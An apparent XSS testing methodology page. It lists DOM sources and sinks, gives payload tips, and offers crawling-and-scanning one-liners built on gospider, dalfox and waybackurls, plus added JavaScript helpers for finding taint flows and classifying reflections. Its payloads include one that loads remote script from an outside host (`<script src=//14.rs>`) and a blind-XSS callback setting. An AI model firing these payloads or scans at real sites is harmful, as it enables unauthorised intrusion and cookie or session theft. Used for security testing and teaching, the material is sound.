# XSS Methodology


## Manual approach

- Sources
  - `document.URL`
  - `document.documentURI`
  - `document.URLUnencoded` (IE 5.5 or later only)
  - `document.baseURI`
  - `location`
  - `location.href`
  - `location.search`
  - `location.hash`
  - `location.pathname`
  - `document.cookie`
  - `document.referrer`
  - `window.name`
  - `history.pushState()`
  - `history.replaceState()`
  - `localStorage`
  - `sessionStorage`
- Sinks
  - `eval`
  - `Function`
  - `setTimeout`
  - `setInterval`
  - `setImmediate`
  - `execScript`
  - `crypto.generateCRMFRequest`
  - `ScriptElement.src`
  - `ScriptElement.text`
  - `ScriptElement.textContent`
  - `ScriptElement.innerText`
  - `anyTag.onEventName`
  - `document.write`
  - `document.writeln`
  - `anyElement.innerHTML`
  - `Range.createContextualFragment`
  - `window.location`
  - `document.location`
- Q: How to identify sinks and sources?
- A: Use the browser extension Untrusted Types by filedescriptor.
- Tips and Tricks (@s0md3v)
  - `http(s)://` can be shortened to `//` or `/\` or `\`.
  - `document.cookie` can be shortened to `cookie`. It applies to other DOM objects as well.
  - `alert` and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()`.
  - You can use `//` to close a tag instead of `>`.
  - I have found that `confirm` is the least detected pop-up function, so stop using `alert`.
  - Quotes around an attribute value aren't necessary as long as it doesn't contain spaces. You can use `<script src=//14.rs>` instead of `<script src="//14.rs">`.
  - The shortest HTML context XSS payload is `<script src=//14.rs>` (19 chars).
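The source and sink lists above are the raw material for the "how do I identify sinks and sources" question. The extension recommended there does it at run time in the browser; as an added example (not code from the original page, from filedescriptor, or from s0md3v) here is a static complement in JavaScript that scans a script for the listed sources and sinks and follows a source through simple assignments into a sink. The sample script it scans, and the names `SOURCES`, `SINKS`, `findFlows`, `directSource` and `SAMPLE`, are constructed for this example.

```javascript
// Added example: a line-oriented source-to-sink finder built from the two lists
// above. It taints a local name when a source is assigned to it, follows that
// name through later simple assignments, and flags any sink line that mentions
// a source or a tainted name. It is a triage aid, not a parser: flows through
// function parameters, object properties or template literals are missed, and
// strings and comments are not distinguished from code.

// Sources, longest first so "location.hash" is reported rather than bare "location".
const SOURCES = [
  "document.URL", "document.documentURI", "document.URLUnencoded",
  "document.baseURI", "location", "location.href", "location.search",
  "location.hash", "location.pathname", "document.cookie",
  "document.referrer", "window.name", "localStorage", "sessionStorage",
].sort((a, b) => b.length - a.length);

// Sinks as [label, pattern]; the (?!=) lookahead keeps "x.innerHTML == y" out.
const SINKS = [
  ["innerHTML", /\.(inner|outer)HTML\s*=(?!=)/],
  ["document.write", /\bdocument\.write(ln)?\s*\(/],
  ["eval", /\beval\s*\(/],
  ["Function", /\bFunction\s*\(/],
  ["setTimeout", /\bsetTimeout\s*\(/],
  ["setInterval", /\bsetInterval\s*\(/],
  ["script.src", /\.src\s*=(?!=)/],           // executes on <script>; noisy on <img>
  ["location", /\blocation(\.href)?\s*=(?!=)/],
  ["createContextualFragment", /\.createContextualFragment\s*\(/],
];

const escapeRe = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
// A source may be qualified ("window.location.hash"); a tainted local may not
// be preceded by "." (so "window.name" never matches a local called "name").
const sourceRe = (s) => new RegExp("(?<![\\w$])" + escapeRe(s) + "(?![\\w$])");
const localRe = (n) => new RegExp("(?<![\\w$.])" + escapeRe(n) + "(?![\\w$])");

// First listed source referenced directly in `text`, or null.
function directSource(text) {
  return SOURCES.find((s) => sourceRe(s).test(text)) || null;
}

// Returns [{line, sink, source, via}] for every sink line reached by a source;
// `via` is the local name that carried the taint, or the source itself.
function findFlows(code) {
  const tainted = new Map();            // local name -> originating source
  const flows = [];
  code.split("\n").forEach((line, i) => {
    const taintedName = (text) => [...tainted.keys()].find((n) => localRe(n).test(text));

    // 1. Taint tracking: "var x = <source or tainted name>" taints x;
    //    reassigning x from a clean expression clears it.
    const assign = line.match(/^\s*(?:(?:var|let|const)\s+)?([A-Za-z_$][\w$]*)\s*=(?!=)/);
    if (assign) {
      const rhs = line.slice(line.indexOf("=") + 1);
      const src = directSource(rhs) || tainted.get(taintedName(rhs) || "");
      if (src) tainted.set(assign[1], src); else tainted.delete(assign[1]);
    }

    // 2. Sink check: a sink on this line fed by a source or a tainted name.
    for (const [sink, re] of SINKS) {
      if (!re.test(line)) continue;
      const src = directSource(line);
      const via = src ? src : taintedName(line);
      if (via) flows.push({ line: i + 1, sink, source: src || tainted.get(via), via });
    }
  });
  return flows;
}

// Constructed sample script to scan (not taken from any real application).
const SAMPLE = [
  'var q = location.hash.slice(1);',
  'var name = decodeURIComponent(q);',
  'document.getElementById("greet").innerHTML = "Hi " + name;',   // flow
  'var theme = localStorage.getItem("theme");',
  'document.body.className = theme;',                               // not a sink
  'var safe = "static";',
  'document.getElementById("x").innerHTML = safe;',                 // clean
  'eval(window.name);',                                             // flow
  'name = "reset";',
  'document.write(name);',                                          // taint cleared
  'setTimeout("show(" + q + ")", 10);',                             // flow
].join("\n");

console.log(findFlows(SAMPLE));
```

The hardened rewrite of the first flow, `el.textContent = name`, is not flagged because `textContent` on an ordinary element is not a sink; on a `<script>` element it is, which is why the list above names `ScriptElement.textContent` separately.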

## Automated approach

- Scanning XSS from host / from @cihanmehmet

```bash
# Crawl every host in targets_urls.txt (10 workers, depth 5, static assets
# blacklisted), keep URLs that answered 200 and carry a query string, append
# a probe to every value (qsreplace -a) and hand the list to dalfox.
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source \
  | grep -e "code-200" | awk '{print $5}' | grep "=" | qsreplace -a | dalfox pipe | tee result.txt
```

- Automating XSS using Dalfox, Gf and Waybackurls / from @theinfosecguy

```bash
# gf xss keeps URLs whose parameter names look XSS-prone. Blank every parameter
# value (one substitution per parameter, so a=1&b=2 becomes a=&b= rather than a=)
# and let dalfox fill them in; -b is your XSS Hunter / blind-XSS callback host.
cat test.txt | gf xss | sed 's/URL: //' | sed 's/=[^&]*/=/g' | tee testxss.txt
dalfox file testxss.txt -b yours.xss.ht
```

- XSS without Gf / from @HacktifyS

```bash
# Pull archived URLs for the target, swap every query value for a probe and
# report URLs where it comes back unencoded. A raw hit only proves the value is
# reflected without encoding; whether it executes depends on the HTML context.
waybackurls testphp.vulnweb.com | grep '=' | qsreplace '"><script>alert(1)</script>' | while read -r host; do
  curl -s --path-as-is --insecure "$host" | grep -qs '<script>alert(1)</script>' \
    && printf '%s \033[0;31mVulnerable\033[0m\n' "$host"
done
```
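All three pipelines share one step: replace every query-string value with a probe, fetch, and look for the probe in the response. As an added example (not code from the page, from qsreplace, or from dalfox), that step is written out below in JavaScript so that two details the one-liners hide are visible: the probe must be sent byte-for-byte (the `URL`/`URLSearchParams` API would percent-encode `<` to `%3C` and the server would never see a real probe), and a probe that comes back entity-encoded is not a finding. The URLs and response bodies are constructed for the example, and `fakeFetch` is a stand-in for `curl` so the script runs offline; `replaceQueryValues`, `classifyReflection` and `scanUrls` are names chosen here.

```javascript
// Added example: the probe-substitute-and-check step of the pipelines above.

// Rebuild the query string by hand so the payload is sent unencoded.
// append=true mirrors `qsreplace -a` (keep the value, add the payload after it).
function replaceQueryValues(url, payload, append = false) {
  const q = url.indexOf("?");
  if (q === -1) return null;                       // nothing to inject into
  const base = url.slice(0, q + 1);
  let rest = url.slice(q + 1), fragment = "";
  const h = rest.indexOf("#");
  if (h !== -1) { fragment = rest.slice(h); rest = rest.slice(0, h); }
  const pairs = rest.split("&").filter((p) => p.length > 0).map((p) => {
    const eq = p.indexOf("=");
    const key = eq === -1 ? p : p.slice(0, eq);
    const val = eq === -1 ? "" : p.slice(eq + 1);
    return key + "=" + (append ? val + payload : payload);
  });
  return base + pairs.join("&") + fragment;
}

// "raw": probe present verbatim. "encoded": only its entity-encoded form is
// present, i.e. the server escaped it. "absent": not reflected at all.
function classifyReflection(body, probe) {
  if (body.includes(probe)) return "raw";
  const encoded = probe
    .replace(/&/g, "&amp;").replace(/</g, "&lt;")
    .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
  if (body.includes(encoded)) return "encoded";
  return "absent";
}

// Probe every URL that has parameters; fetchBody(url) returns the response body
// (curl in the pipelines above, a canned lookup here).
function scanUrls(urls, probe, fetchBody) {
  const results = [];
  for (const url of urls) {
    const target = replaceQueryValues(url, probe);
    if (target === null) continue;
    results.push({ url: target, reflection: classifyReflection(fetchBody(target), probe) });
  }
  return results;
}

// --- constructed data: URLs and canned responses standing in for curl ---
const PROBE = '"><script>alert(1)</script>';
const URLS = [
  "https://example.test/search?q=shoes&page=2#top",   // echoes q unescaped
  "https://example.test/item?id=7",                    // echoes id entity-encoded
  "https://example.test/about",                        // no parameters: skipped
];
function fakeFetch(url) {
  if (url.startsWith("https://example.test/search?")) {
    return '<input value="' + PROBE + '">';           // value echoed without escaping
  }
  return "<p>item " + PROBE.replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;") + "</p>";
}

console.log(scanUrls(URLS, PROBE, fakeFetch));
```

Only the `raw` result deserves a manual look; an `encoded` reflection is the server doing its job, and treating it as a hit is the most common false positive in grep-based XSS pipelines.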

## Resources